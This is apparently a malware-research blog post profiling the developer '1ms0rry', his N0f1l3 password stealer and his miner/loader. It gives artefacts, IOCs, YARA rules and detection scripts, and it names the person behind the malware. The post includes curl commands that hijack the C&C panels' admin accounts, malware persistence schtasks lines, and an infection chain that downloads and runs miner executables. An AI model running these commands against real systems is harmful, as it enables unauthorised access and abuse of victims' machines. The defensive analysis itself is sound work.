<h1>Sorry. Not sorry 1ms0rry. Atsamaz Gatsoev malware business</h1>
benkow_, 2018-04-08 (updated 2020-10-31)</br>
Hey!</br>
Here we go for another write up, but this time with some friends :D</br>
Greetz to .sS.!, coldshell, fumik0_, siri_urz, VxVault, Cybercrime-Tracker, .sS.! (again).</br>
</br>
This post is a quick reminder for the "malware researcher":</br>
<center><img src="https://i.imgur.com/40ewdJT.png" height=30% /></center>
Developing and selling malware is lame and illegal.
</br></br>
<h2>Introduction</h2>
In this blogpost, we will try to present another malware actor called 1ms0rry. This guy made himself known by selling
a password stealer called N0f1l3 on some hacking forums, and you may also recognize him as the man behind the miner "1ms0rry-Miner", which has been pretty active in the wild these last months.</br></br>
1ms0rry was selling builders and/or source code for his malware.</br></br>
<center><img src="https://i.imgur.com/Eoxx6HY.gif"/></center></br>
There is a high probability that almost all the C&C servers are controlled by customers and not by 1ms0rry himself.</br></br>
This write-up is exclusively about this malware developer, not about the botmaster(s).</br></br>
<h2>Malware Zoo</h2>
<h3>N0f1l3</h3>
The <a href="https://ifud.ws/threads/private-stealer-n0f1l3-admin-panel-by-ims0rry.13376/"> selling ads</a> (RU/Google translate)</br>
<center><a href="https://i.imgur.com/rWQstBf.png"><img src="https://i.imgur.com/rWQstBf.png" height=650px /></a> <a href="https://i.imgur.com/TsP4leZ.png"><img src="https://i.imgur.com/TsP4leZ.png" height=650px /></a></center></br>
<h4>The malware</h4>
The first one is a malware called N0F1L3, spotted on some forums and sold for $20 for a build or $600 for the source code.</br>
This password stealer was developed to steal:</br>
<ul>
<li>Browser passwords and cookies (Chrome, Opera, Kometa, Orbitum, Comodo, Amigo, Torch and Yandex)</li>
<li>Crypto-Currencies wallets (btc, electrum, ltc, eth, bcn, DSH, XMR, ZEC)</li>
<li>Filezilla passwords</li>
<li>Every file on the desktop with the extensions .txt .doc .docx .log</li>
</ul>
This malware is developed in .NET.</br></br>
File artefacts:</br>
<ul>
<li><code>%TEMP%\Directory\Browsers\Passwords.txt</code></li>
<li><code>%TEMP%\Directory\Browsers\Cookies.txt</code></li>
<li><code>%TEMP%\Directory\Browsers\CC.txt</code></li>
<li><code>%TEMP%\Directory\Browsers\Autofill.txt</code></li>
<li><code>%TEMP%\[HWID].zip</code></li>
</ul>
Directories:</br>
<ul>
<li><code>%TEMP%\Directory\Files\Desktop</code></li>
<li><code>%TEMP%\Directory\Files\Filezilla</code></li>
<li><code>%TEMP%\Directory\Wallets\BitcoinCore</code></li>
<li><code>%TEMP%\Directory\Wallets\Electrum</code></li>
<li><code>%TEMP%\Directory\Wallets\LitecoinCore</code></li>
<li><code>%TEMP%\Directory\Wallets\Ethereum</code></li>
<li><code>%TEMP%\Directory\Wallets\Bytecoin</code></li>
<li><code>%TEMP%\Directory\Wallets\Monero</code></li>
<li><code>%TEMP%\Directory\Wallets\DashCore</code></li>
</ul>
</br><center><img src="https://i.imgur.com/5AmnYRC.png" height=20% /></center></br>
Notice that there is no persistence mechanism at all, neither in the published source code nor in the samples seen in the wild.</br>
In some samples we found this PDB path:</br>
<code> C:\Users\gorno\Documents\Visual Studio 2015\Projects\ims0rry\ims0rry\obj\Release\n0f1l3.pdb</code></br>
This path comes from 1ms0rry's own computer; we will understand why later.</br></br>
Another interesting fact is that this stealer also targets Russian browsers:</br>
it handles browsers like Yandex, which is hardly used outside Russia.</br>
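To turn the artefact list above into something usable during incident response, here is an added example (my own code, not part of the original post and not the malware's code) that checks a user's %TEMP% directory for the N0f1l3 files and staging directories listed above. The function names, the <code>[HWID].zip</code> name pattern (the write-up does not give the exact format of the hardware id, so any short hex name directly in %TEMP% is reported) and the constructed demo directory are assumptions.

```python
# Added example: check a %TEMP% directory for the N0f1l3 artefacts named in
# the write-up. Function names and the demo directory are my own.
import os
import re
import tempfile
from pathlib import Path

# File artefacts dropped under %TEMP%\Directory (paths from the write-up)
N0F1L3_FILES = [
    r"Directory\Browsers\Passwords.txt",
    r"Directory\Browsers\Cookies.txt",
    r"Directory\Browsers\CC.txt",
    r"Directory\Browsers\Autofill.txt",
]

# Staging directories created under %TEMP%\Directory (paths from the write-up)
N0F1L3_DIRS = [
    r"Directory\Files\Desktop",
    r"Directory\Files\Filezilla",
    r"Directory\Wallets\BitcoinCore",
    r"Directory\Wallets\Electrum",
    r"Directory\Wallets\LitecoinCore",
    r"Directory\Wallets\Ethereum",
    r"Directory\Wallets\Bytecoin",
    r"Directory\Wallets\Monero",
    r"Directory\Wallets\DashCore",
]

# %TEMP%\[HWID].zip is the exfiltration archive. The exact hwid format is not
# given in the write-up, so this pattern is an assumption: a short hex name.
HWID_ZIP = re.compile(r"^[0-9A-Fa-f]{6,16}\.zip$")


def _to_native(rel):
    """Convert a backslash-separated relative path to the host's separator."""
    return os.path.join(*rel.split("\\"))


def scan_temp_for_n0f1l3(temp_root):
    """Return the artefacts found under temp_root.

    'files' and 'dirs' hold matching relative paths (backslash form, as in
    the write-up); 'zips' holds archive names matching the HWID pattern.
    """
    root = Path(temp_root)
    found = {"files": [], "dirs": [], "zips": []}
    for rel in N0F1L3_FILES:
        if (root / _to_native(rel)).is_file():
            found["files"].append(rel)
    for rel in N0F1L3_DIRS:
        if (root / _to_native(rel)).is_dir():
            found["dirs"].append(rel)
    if root.is_dir():
        for entry in root.iterdir():
            if entry.is_file() and HWID_ZIP.match(entry.name):
                found["zips"].append(entry.name)
    return found


def is_n0f1l3_infected(temp_root):
    """Verdict: the Directory\\Browsers files or the wallet staging tree are
    specific enough to flag on their own; a lone hex .zip is not."""
    found = scan_temp_for_n0f1l3(temp_root)
    return bool(found["files"] or found["dirs"])


def build_constructed_temp():
    """Create a throw-away directory that mimics an infected %TEMP%
    (constructed demo data, not the output of a real sample run)."""
    tmp = tempfile.mkdtemp(prefix="n0f1l3_demo_")
    browsers = Path(tmp, "Directory", "Browsers")
    browsers.mkdir(parents=True)
    (browsers / "Passwords.txt").write_text("constructed\n")
    (browsers / "Cookies.txt").write_text("constructed\n")
    Path(tmp, "Directory", "Wallets", "Electrum").mkdir(parents=True)
    Path(tmp, "1A2B3C4D.zip").write_bytes(b"PK\x05\x06" + b"\x00" * 18)
    return tmp


if __name__ == "__main__":
    demo = build_constructed_temp()
    print(scan_temp_for_n0f1l3(demo))
    print("infected:", is_n0f1l3_infected(demo))
    # On a real Windows host: scan_temp_for_n0f1l3(os.environ["TEMP"])
```

Since the stealer has no persistence, the staging tree under %TEMP% is often the only trace left on disk once the process has exited, which is why the check is path-based rather than process-based.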
</br>
<h4>The C&C</h4>
The login page:</br>
<center><a href="https://i.imgur.com/NMyxl0U.png"><img src="https://i.imgur.com/NMyxl0U.png" height=550px /></a></center></br>
The collected logs list:</br>
<center><a href="https://i.imgur.com/cT9IcPm.png"><img src="https://i.imgur.com/cT9IcPm.png" height=530px /></a></center></br>
Each collected log appears in a separate HTML file:</br>
<center><a href="https://i.imgur.com/YlfHlRF.png"><img src="https://i.imgur.com/YlfHlRF.png" height=150px /></a></center></br>
Minimal settings:</br>
<center><a href="https://i.imgur.com/leAtlIK.png"><img src="https://i.imgur.com/leAtlIK.png" height=250px /></a></br></center>
And a search engine:</br>
<center><a href="https://i.imgur.com/UstaMfv.png"><img src="https://i.imgur.com/UstaMfv.png" height=300px /></a></center></br>
The panel is simple but efficient.</br></br>
<h4>Vulnerabilities</h4>
Since the panel has leaked almost everywhere, and the new versions are patched, let's take a look at the vulnerabilities in it.</br>
The admin password can easily be changed.</br>
If you look at the first lines of cmd.php (the gate):</br>
<iframe src="https://pastebin.com/embed_iframe/Uj1VTv2J/noheader" style="border:none;width:100%"></iframe>
</br>
A single POST request with 3 parameters, without any authentication, is enough to change the password:</br></br>
<code>curl -i -X POST -d 'login=admin&password=lulz&change=1' http://n0f1l3cnc.com/cmd.php --header "Referer: http://n0f1l3cnc.com/settings.php"</code>
</br>
</br>
The panel also has some unauthenticated SQL injection:</br>
<iframe src="https://pastebin.com/embed_iframe/3G6mLRAi/noheader" style="border:none;width:100%"></iframe>
</br></br>
<h4>IOCs</h4>
PDB related:</br>
C:\Users\gorno\Documents\Visual Studio 2015\Projects\ims0rry\ims0rry\obj\Release\n0f1l3.pdb</br>
C:\Users\gorno\Documents\Visual Studio 2015\Projects\n0f1l3v2\Release\Test.pdb</br></br>
CNCs and associated samples:</br>
<pre>
manganic-rumbles.000webhostapp.com
40cfb089f9e02a6038177cbec830f387622f5e2b268797682f67a56c303abee
tokar222.000webhostapp.com
b1def07459fbc7d417430edf70330e15ad8a775be00d8ccecd25ff240bd00884
ih871411.myihor.ru
2fdf25b8518afd461969fae0dded14500fc6a53dfe231eb8ceb7982a31df604c
9ville.000webhostapp.com
46483f88191566a4317d79f27f7a289e3503537ee9e1007661864df82ccc8338
lmdlm.xyz
0604de5851a210255b1314430b421573c19c374476260fc96de8924fab332581
jwad0w.000webhostapp.com
28a076ab9282cc2276e84ae3894d64e42af7a9deb26f0b575e526cd01196678b
iden1930.000webhostapp.com
Demo panel
</pre>
</br>
Yara:</br>
<pre>
rule n0f1l3: N0F1L3
{
    meta:
        description = "N0f1l3 Stealer"
        date = "2018-04-06"
        author = "coldshell"
        reference = "https://benkowlab.blogspot.com/2018/04/sorry-not-sorry-1ms0rry-atsamaz-gatsoev.html"
    strings:
        $mz = {4D 5A}
        // N0f1l3 is a .NET binary: its string literals are stored as UTF-16, hence "wide"
        $string1 = "\\Passwords.txt" ascii wide
        $string2 = "\\Cookies.txt" ascii wide
        $string3 = "\\CC.txt" ascii wide
        $string4 = "\\Autofill.txt" ascii wide
        $string5 = "\\AppData\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data" ascii wide
    condition:
        $mz at 0 and all of them
}
</pre>
</br></br>
<h4>N0f1l3 v2</h4>
We found an N0f1l3 v2 in the wild.</br>
This sample was embedded in a malware crypter named "Paradox Crypter":
<center><a href="https://i.imgur.com/THmhCGK.png"><img src="https://i.imgur.com/THmhCGK.png" height=359px /></a></center></br>
The crypter sample c9a87d68a65ade147208ac8a6d68297877f145285e3f3f40ec01ea8d562fadc9 injects the payload, whose PDB path is:</br>
<code>C:\Users\gorno\Documents\Visual Studio 2015\Projects\n0f1l3v2\Release\Test.pdb</code></br>
What's new in the v2?</br>
It is now written in C++ and the stealer also supports Firefox; for the rest, it's just N0f1l3 :)</br>
</br></br>
<h3>1ms0rry Miner</h3>
Here we go for the 2nd malware, which is a Loader + Miner.</br>
The <a href="https://darkwebs.ws/threads/33056/">selling ads</a> (RU/Google translate)(click to enlarge):</br>
<center><a href="https://i.imgur.com/csmp8ke.jpg"><img src="https://i.imgur.com/csmp8ke.jpg" height=850px/></a>
<a href="https://i.imgur.com/a3aACrb.jpg"><img src="https://i.imgur.com/a3aACrb.jpg" height=850px/></a></center>
</br>
Prices:</br>
<ul>
<li>CPU version - 3000 rubles</li>
<li>GPU version - 3000 rubles</li>
<li>EXTENDED version - 5500 rubles</li>
<li>PRIVATE version - from $ 2000 (discussed individually)</li>
<li>MULTIACC version - 40 000 rubles / month</li>
<li>SOURCE - 200 000 rubles</li>
<li>Bitcoin-purse substitution module - 500 rubles</li>
<li>Stealer module with admin panel - 2500 rubles</li>
<li>Resale of licenses is strictly prohibited (starting from 19.01.2018)</li>
</ul>
</br></br>
<h4>LoaderBot</h4>
LoaderBot is developed in .NET and reuses a lot of code from N0f1l3.</br>
It has basic features.</br>
It kills itself if Task Manager or Process Hacker is launched (the "Hides from the task manager, process hacker (absolutely no processes)" feature in the ad).
<center><img src="https://i.imgur.com/nRfKyWg.png" height=300px /></center></br>
</br>
The malware installs itself in <code>C:\users\%userprofile%\AppData\Roaming\Windows\</code></br>
Persistence is achieved by:</br>
<ul>
<li>A scheduled task: <code>"cmd", "/C "+"schtasks /create /tn \System\\SecurityServiceUpdate /tr %userprofile%\AppData\Roaming\Windows\" + currFilename + " /st 00:00 /du 9999:59 /sc daily /ri 1 /f;</code></li>
<li>A registry Run key: <code>HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</code></li>
<li>A .url file pointing to <code>URL=file://path/to/the/malware</code></li>
</ul>
Available features:
<ul>
<li>Update</li>
<li>Download</li>
<li>Execute</li>
</ul>
</br>
Communication with the C&C is done through GET requests to <code>http://cnc.com/cmd.php?</code> with the following parameters:</br>
<ul>
<li>hwid: Used as bot ID (VolumeSerialNumber)</li>
<li>timeout: timeout in case of CNC failure</li>
<li>completed: task ID completed</li>
</ul>
The User-Agent used is <code>"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0"</code></br></br>
So, before infecting the victims with a Miner, the attacker installs this loader.</br></br>
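As an added example (my own code, not from the original post), here is how a defender could hunt for these check-ins in web proxy logs. The <code>cmd.php</code> gate, the <code>hwid</code>/<code>timeout</code>/<code>completed</code> parameters and the User-Agent string come from the write-up; the log line format, the host names, the hwid values and the sample lines are constructed for the demo.

```python
# Added example: flag LoaderBot check-ins in proxy logs. Gate name, query
# parameters and User-Agent are from the write-up; everything else is mine.
from urllib.parse import urlsplit, parse_qs

LOADERBOT_UA = "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0"
BEACON_PARAMS = {"hwid", "timeout", "completed"}

# Constructed proxy log lines: "<client-ip> <method> <url> <user-agent>"
SAMPLE_PROXY_LOG = """\
10.0.0.5 GET http://example-cnc.test/cmd.php?hwid=1A2B3C4D Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
10.0.0.5 GET http://example-cnc.test/cmd.php?hwid=1A2B3C4D&completed=3 Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
10.0.0.7 GET http://example-cnc.test/cmd.php?timeout=1 Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
10.0.0.9 GET http://www.example.com/index.php?id=42 Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
10.0.0.9 GET http://shop.example.com/cmd.php?hwid=ABCDEF12 Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/65.0
"""


def classify_request(line):
    """Return a finding for one log line, or None if it does not look like a
    LoaderBot check-in (GET to a cmd.php gate with a beacon parameter)."""
    try:
        client, method, url, ua = line.split(" ", 3)
    except ValueError:
        return None  # malformed line, not enough fields
    parts = urlsplit(url)
    if method != "GET" or not parts.path.endswith("/cmd.php"):
        return None
    params = set(parse_qs(parts.query, keep_blank_values=True))
    matched = sorted(params & BEACON_PARAMS)
    if not matched:
        return None
    return {
        "client": client,
        "host": parts.hostname,
        "params": matched,
        # the UA is hard-coded in the bot, so an exact match raises confidence;
        # a cmd.php?hwid= request from another UA is still worth a look
        "confidence": "high" if ua == LOADERBOT_UA else "medium",
    }


def find_beacons(log_text):
    """Run classify_request over every non-empty line and collect findings."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        finding = classify_request(line)
        if finding:
            findings.append(finding)
    return findings


def suspected_bots(log_text):
    """Map client IP -> set of C&C hosts it checked in to (any confidence)."""
    bots = {}
    for finding in find_beacons(log_text):
        bots.setdefault(finding["client"], set()).add(finding["host"])
    return bots


if __name__ == "__main__":
    for finding in find_beacons(SAMPLE_PROXY_LOG):
        print(finding)
    print(suspected_bots(SAMPLE_PROXY_LOG))
```

The same three parameter names are what the YARA rule further down keys on in the binary, so a proxy hit and a YARA hit on the client corroborate each other.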
<h4>Miner</h4>
The .NET loader drops a miner developed in C++.</br>
The first stage installs the final miner:</br>
<ul>
<li>Copies itself to <code>%userprofil%\\AppData\\Roaming\\Microsoft\\Windows\\winhost.exe</code></li>
<li>Creates a scheduled task: <code>schtasks /create /tn \\System\\SecurityService /tr %userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\winhost.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f</code></li>
<li>Hides the installed files via <code>attrib +s +h</code></li>
<li>Checks whether taskmgr.exe or processhacker.exe is running</li>
<li>Detects whether a wallet address is in the clipboard and, if so, replaces it</li>
<li>Uses RunPE to launch a fake attrib.exe (the final miner). RunPE is done via <code>CreateProcessA (suspended) / SetThreadContext / WriteProcessMemory / ResumeThread</code>. This code is a copy-paste from <a href="https://github.com/KernelMode/RunPE-ProcessHollowing">https://github.com/KernelMode/RunPE-ProcessHollowing</a></li>
</ul>
The final payload is a C++ miner based on xmrig:</br>
<center><a href="https://i.imgur.com/EXMHhZ2.png"><img src="https://i.imgur.com/EXMHhZ2.png" height=500px /></a></center></br></br>
<h4>The C&C</h4>
Login page:</br>
<center><a href="https://i.imgur.com/jXFiLFv.jpg"><img src="https://i.imgur.com/jXFiLFv.jpg" height=400px/></a></center></br>
Workers (hi IPv6 :) ):</br>
<center><a href="https://i.imgur.com/8AlECDX.png"><img src="https://i.imgur.com/8AlECDX.png" height=400px/></a></center></br>
Tasks:</br>
<center><a href="https://i.imgur.com/991Co1q.png"><img src="https://i.imgur.com/991Co1q.png" height=400px/></a></center></br>
Settings:</br>
<center><a href="https://i.imgur.com/RMxzzYF.png"><img src="https://i.imgur.com/RMxzzYF.png" height=400px/></a></center></br></br>
<h4>The admin C&C/Market</h4>
When 1ms0rry developed the Miner, he also developed a backend called SorryCoin.</br>
This panel is used by him and his resellers to build samples and for support purposes.</br>
Here you can see 1ms0rry showing off SorryCoins and asking for new resellers:
<center><a href="https://i.imgur.com/B2lZYbm.jpg"><img src="https://i.imgur.com/B2lZYbm.jpg" height=650px></a> <a href="https://i.imgur.com/pT9XLT0.jpg"><img src="https://i.imgur.com/pT9XLT0.jpg" height=650px></a></center></br>
Panel Instructions (translated from the Russian original):</br>
<pre>
Panel information
Personal statistics
Personal user statistics exist so that you can conveniently track your own achievements and progress.
They show: the total number of builds made, the number of sales, the number of recrypts/cleanings/updates issued,
your position, registration date, money earned, the number of buyers on the blacklist and your SorryCoins.
SorryCoins are used to measure your efficiency in the team. For every cleaning/recrypt/update/sale you are credited
a certain number of coins. Every month each team member will receive a bonus from me equal to the number of
his coins.
Builds
The main page. Used to create miner and bot builds. You must fill in the fields: pool, pool wallet
(for example, for minergate - www@mail.ru), pool password (usually x), logger (a link for collecting IPs; if not needed,
you can enter anything), link to the admin panel (to the cmd.php file; you can enter anything if the field is not needed),
bitcoin substitution wallet (for the bitcoin stealer; you can enter anything if the field is not needed),
price (the full amount the client paid), note (you can write anything if the field is not needed),
build type and the version the buyer purchased. After creating the request you must wait until the status of your
build changes from queue to done. Then follow the links, download the files and hand them over to the client.
Pricing
The "Pricing" tab lists the official prices for the products and information about your income from each sale.
They may change, so check once a day.
Overall statistics
The overall statistics show the progress of the whole team: the total number of builds, sales,
recrypts/cleanings/updates, team members, money earned, buyers on the blacklist.
Materials
This tab contains the latest materials for the miner and information about the versions of the miner, bot and stub.
Blacklist
This section was created to make communication with clients easier (sarcasm). If you refuse support to someone, you must
add that client to the database and record his contacts, nickname and the reason for the refusal.
Visit log
A page available only to the admin. Shows user visit logs. Allows account sharing to be detected.
Users
The user (team) database, in which you can track the progress of the other members.
TODO
A list of what needs to be done. Handy if you need to write something down. Everyone has an individual notebook;
nobody else can view it.
</pre>
Panels Overview:</br>
<center><a href="https://i.imgur.com/LrOEVz6.png" ><img src="https://i.imgur.com/LrOEVz6.png" height=450px/></a></center></br>
<center><a href="https://i.imgur.com/j2NERIp.png" ><img src="https://i.imgur.com/j2NERIp.png" height=450px /></a></center></br>
<center><a href="https://i.imgur.com/BxtBB2a.png" ><img src="https://i.imgur.com/BxtBB2a.png" height=350px/></a></center></br>
<center><a href="https://i.imgur.com/SP9L1j7.png" ><img src="https://i.imgur.com/SP9L1j7.png" height=450px /></a></center></br>
<center><a href="https://i.imgur.com/4jeYqOk.png" ><img src="https://i.imgur.com/4jeYqOk.png" height=350px /></a></center></br>
<center><a href="https://i.imgur.com/YY53Cbh.png" ><img src="https://i.imgur.com/YY53Cbh.png" height=450px /></a></center></br>
<center><a href="https://i.imgur.com/hYIeZbb.png" ><img src="https://i.imgur.com/hYIeZbb.png" height=450px /></a></center></br>
</br>
<h4>Vulnerabilities</h4>
As usual, code reuse = vuln reuse. The admin account takeover is still here:</br>
<code>curl -i -X POST -d 'login=admin&password=mypass&amp;note=&type=admin&useradd=1' http://S0rryCoinCnC/cmd.php --header "Referer: http://S0rryCoinCnC/users.php"</code>
</br></br>
<h4>IOCs</h4>
PDB related:</br>
C:\Users\gorno\Documents\Visual Studio 2015\Projects\GPULoader\GPULoader\obj\Release\GPULoader.pdb</br>
c:\Users\User\Desktop\[NEW] builder\Bot\Miner\obj\Release\LoaderBot.pdb</br>
c:\inetpub\wwwroot\Bot\Miner\obj\Release\LoaderBot.pdb</br>
C:\Users\gorno\Desktop\RelWithDebInfo\xmrig.pdb</br>
C:\Users\gorno\Desktop\[NEW] builder\Miner\Release\winhost.pdb</br>
c:\Users\gorno\Desktop\[NEW] builder\Bot\Miner\obj\Release\LoaderBot.pdb</br></br>
CNCs and associated samples:</br>
<pre>
ih753479.myihor.ru
b25c3eda59e0014df05c9aa4451ab09c2153ddb919e105a693f1f8923e465157
ih894017.myihor.ru
e61d08bea42a6d2d49819e81e18b76db4413a1d80abeac8d8f8a75f18b940b24
ih895435.myihor.ru
867e605f0dc7d8e5aa62a9db99ebc8f12b1c09713707298c3c70e0294d14ebb7
ih903818.myihor.ru
a8c7f6dbc844a2b8b10e1751f65453b20392fa82caa9e83fcce3c496b3021fba
sawerticq.myihor.ru
45cec8803dd773469012d80afd3abf3eaf9a8f8b938a03ce8e52c2cba6dd28d2
pokerhot.ru
[...].beget.tech
[...]-kuphino.ru
2b099e9ab15b5056b0e4b09ea5751ecb76ebce1b02251c4a23fc133ea04918ee
81660ecc8467a284b689afdc3b60b5faa73b2a8385c57000e6c19f05944cf714
e5ecf75fe7991a351e52d64d14e6fb96c9d6eec7f5a0ccc64ea67753be03714a
6fa7da5f3026074b6c2a4b98865175f024941057a8c55d5516797f928a737195
panel.enable.pw
aa5037e15d6c2ea27fff9726cc3951660490273726edc9510a5e78d0afb82e68
t3h1337.se
[...].tmweb.ru
f80742032ff611f7e569f4f9b1d879377f81a3ae2a85e0234c161de5122058b0
2cfa2019f3002c7ea1f9cb1555caa5b84554f68e1cd54a436c9aa67a9359286f
uomomo.tmweb.ru
eb7d44264bc83c2f77958342aede1d2d266ee53380295ce9fd3e3630780031c9
67864.prohoster.biz
cd2874a83ca324eebbeaa134330d667aee72d28ded20bd44d4d48c91ce6474b1
109.234.36.233
a80038832522f8a4a0d5bfba7755ac73d506a0c523e8f86a4d7ae2dc798c0937
c577a5ddbdf85ab2a168223d80981cf1d835f15dbf0437cc43b5801cc37010a6
61d75bf9a006dcfea78e0c792cc4db7b0de82cd847d30680be08c463eaaf643f
sorry.enable.pw
2d6e94a539f89b3dfc3c8ced8ca7facf3840a3706fa6079a9328234133936143
zlives.ru
[...].000webhostapp.com
79ad0aec7a30a8c3085256a6b36fafdc5448a6392ae79621356e6de6cede90ae
6ab8bbf76641e1f04252f7a8a579b2c7a493cd67452222a08260d3ef827113ff
1f3d0bf4afc4b31c0e1dac027636c0996cc99e474d6b85d68fd7e27c919d34e6
plaza777.co.ua
50587f56bc5cda5c9c49bfe233cea4a6da70207d34506865d215f6f84d75af17
v90327ux.beget.tech
efa35d539608624d3c70210ebd15e4a3103abc3fcbd5e47c76bcb25a10f3aae8
moneyrob.info
b6674acc2314913ad8c8ed14ce50c12b0f6babff3081969d7e2a1ab05f53af96
ce24411.tmweb.ru
c443c08c3071d3842b9cc26bbb34125e0baf894600f56b2aaab4519f488a31f3
294300b8ec1c41d0a0c71283d02bb359f6c9e38db2d630e1ec6087abf763730f
4da1b7cd2e6b5e53f4395eceb2d9180dec678e3c28cdff5ca54bb8526cef4bd8
56f9709e665738fd81d0880c4eecc45e678784880cdb83e9808bbff606d41cc9
a9bdf007c8a31e2034171fdfb20d07a51341e3e4977ef118a9764597d728a0b6
711ec24f2a2d1daff050a10fa3c3f2bf6b86a3ce02e785fe2327836ff2c4c9f1
68054.prohoster.biz
fefedc45386b83926aaa6893121bed424be0e0278319a5d97ee0cb74c7133144
5.200.55.248
karlikvm.beget.tech
61d094a1bd6305aa89193fdf9cb68ece3f28475b10adee1e71b9dfc96d0cb992
</pre>
Yara: </br>
<pre>
// YARA identifiers cannot start with a digit, so the rule is named ims0rryMiner
rule ims0rryMiner: ims0rryMiner
{
    meta:
        description = "1ms0rry Miner"
        date = "2018-04-06"
        author = "benkow_"
        reference = "https://benkowlab.blogspot.com/2018/04/sorry-not-sorry-1ms0rry-atsamaz-gatsoev.html"
    strings:
        $mz = {4D 5A}
        // LoaderBot is a .NET binary: its string literals are stored as UTF-16, hence "wide"
        $string1 = "?hwid=" ascii wide
        $string2 = "&completed=" ascii wide
        $string3 = "?timeout=1" ascii wide
        $string4 = "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0" ascii wide
        $string5 = "LoaderBot.Properties.Resources" ascii wide
    condition:
        $mz at 0 and all of them
}
</pre></br></br>
<h2>Misc</h2>
</br>
Timeline (click to enlarge):</br>
<center><a href="https://i.imgur.com/rGWGJL0.jpg"><img src="https://i.imgur.com/rGWGJL0.jpg" height=250px/></a></center>
</br>
</br>
<h4>Attack vectors</h4>
Some campaigns using 1ms0rry malware:</br>
<ul>
<li>Fake fonts: <a href="https://www.malware-traffic-analysis.net/2017/11/27/index.html">https://www.malware-traffic-analysis.net/2017/11/27/index.html</a> or <a href="https://www.malware-traffic-analysis.net/2017/11/12/index.html">https://www.malware-traffic-analysis.net/2017/11/12/index.html</a></li>
<li>Fake Flash installer: <a href="https://www.malware-traffic-analysis.net/2018/01/02/index2.html">https://www.malware-traffic-analysis.net/2018/01/02/index2.html</a></li>
<li><a href="https://www.hybrid-analysis.com/sample/e6aeef24c04a1d327e9b8337ca50c74f686ca041ac161a130ca31003ceaaaa7e?environmentId=100">https://www.hybrid-analysis.com/sample/e6aeef24c04a1d327e9b8337ca50c74f686ca041ac161a130ca31003ceaaaa7e?environmentId=100</a>: this sample is really interesting. The infection chain is:</br>
<pre>
github.com/vaio666999/2/blob/master/GoogleUpdater.exe << LoaderBot :: sorry.enable.pw/cmd.php?hwid=24C2B6A0
github.com/vaio666999/2/raw/master/GoogleUpdate.exe << Rarog :: api.enable.pw/2.0/method/checkConnection
github.com/vaio666999/2/raw/master/xmrig32.exe User-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0
xmrig32.exe -o xmr.pool.minergate.com:45560 -u stasmiomi@gmail.com -p x -k -t 1
</pre>
61d094a1bd6305aa89193fdf9cb68ece3f28475b10adee1e71b9dfc96d0cb992 is <a href="https://researchcenter.paloaltonetworks.com/2018/04/unit42-smoking-rarog-mining-trojan/">Rarog</a></li>
<li>Backdoored software:</br>
efa35d539608624d3c70210ebd15e4a3103abc3fcbd5e47c76bcb25a10f3aae8 - RDP Bruter</br>
76a811884030d751efac2ede5d5f8cb75bd2d72e7dee1327005838b5f08a8b28 - WinDjView setup</br>
c9a87d68a65ade147208ac8a6d68297877f145285e3f3f40ec01ea8d562fadc9 - Paradox Crypter</li>
</ul>
</br>
</br>
<h4>Competitive analysis</h4>
This actor is really active on his GitHub. Thanks to him, it is a gold mine of information about what is going on in the seller forums.
He decompiled a bunch of malware, analyzed them on telegra.ph and pushed all the sources to his repository.
This is a good way for him to check that there is no copycat of his miner. For example, when he analyzed a miner developed by EvilBanana,
he explicitly mentioned that it is a bad copy of "his" miner:</br></br>
<center><img src="https://i.imgur.com/KqyAxoI.png" height=50%/></center></br>
The highlighted sentence means "this miner turned out
to be my miner of the first version, but it's a little broken for some reason".</br></br>
He reviewed a variety of malware/tools (miners, botnets, loaders...) and tried to explain whether the features were really well developed and effective, or just basic crappy stuff.</br></br>
Reviews are available here:
<ul>
<li><a href="http://telegra.ph/Analiz-skrytogo-majnera-ot-Dzotra-12-31">http://telegra.ph/Analiz-skrytogo-majnera-ot-Dzotra-12-31</a></li>
<li><a href="http://telegra.ph/Analiz-botneta-DarkSky-12-30">http://telegra.ph/Analiz-botneta-DarkSky-12-30</a></li>
<li><a href="http://telegra.ph/Analiz-skrytogo-majnera-ot-Hostis666-12-20">http://telegra.ph/Analiz-skrytogo-majnera-ot-Hostis666-12-20</a></li>
<li><a href="http://telegra.ph/Analiz-skrytogo-majnera-ot-GucciMine-12-05">http://telegra.ph/Analiz-skrytogo-majnera-ot-GucciMine-12-05</a></li>
<li><a href="http://telegra.ph/Pishem-kejlogger-na-C-12-07">http://telegra.ph/Pishem-kejlogger-na-C-12-07</a></li>
<li><a href="http://telegra.ph/Analiz-skrytogo-majnera-ot-Proga-12-10">http://telegra.ph/Analiz-skrytogo-majnera-ot-Proga-12-10</a></li>
<li><a href="http://telegra.ph/Analiz-skrytogo-majnera-ot-Eduard1337Vans-12-10">http://telegra.ph/Analiz-skrytogo-majnera-ot-Eduard1337Vans-12-10</a></li>
<li><a href="http://telegra.ph/Pishem-nerezidentnyj-RunPE-loader-na-C-12-12">http://telegra.ph/Pishem-nerezidentnyj-RunPE-loader-na-C-12-12</a></li>
<li><a href="http://telegra.ph/Analiz-skrytogo-majnera-ot-EvilBanana-ims0rry-12-25">http://telegra.ph/Analiz-skrytogo-majnera-ot-EvilBanana-ims0rry-12-25</a></li>
<li><a href="http://telegra.ph/Pishem-miniatyurnyj-HTTP-flooder-na-Python-3-12-28">http://telegra.ph/Pishem-miniatyurnyj-HTTP-flooder-na-Python-3-12-28</a></li>
<li><a href="http://telegra.ph/Analiz-skrytogo-majnera-ot-Hawksh-01-01">http://telegra.ph/Analiz-skrytogo-majnera-ot-Hawksh-01-01</a></li>
